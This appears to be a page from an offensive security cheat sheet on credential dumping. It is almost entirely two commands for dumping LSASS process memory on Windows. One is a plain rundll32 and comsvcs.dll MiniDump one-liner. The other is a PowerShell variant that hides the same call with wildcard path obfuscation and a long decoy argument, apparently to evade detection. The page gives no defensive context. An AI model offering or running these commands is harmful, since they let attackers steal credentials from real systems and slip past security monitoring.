Credentials Dumping

Living-off-the-Land Binaries

rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full

Globfuscation

&$env:???t??r???\*2\r[t-u]???[k-l]?2* $(gi $env:???t??r???\*2\c?m?[v-w]*l | % {
  $_.FullName }), `#-999999999999999999999999999999999999999999999999999999999999
  999999999999999999999999999999999999999999999999999999999999999999999999999999
  999999999999999999999999999999999999999999999999999999999999999999999999999999
  99999999999999999976-decoy $(gps l?a*s).id c:\t??p\dmp.log full;

PreviousPost-Exploitation NextPersistence

Last updated 6 months ago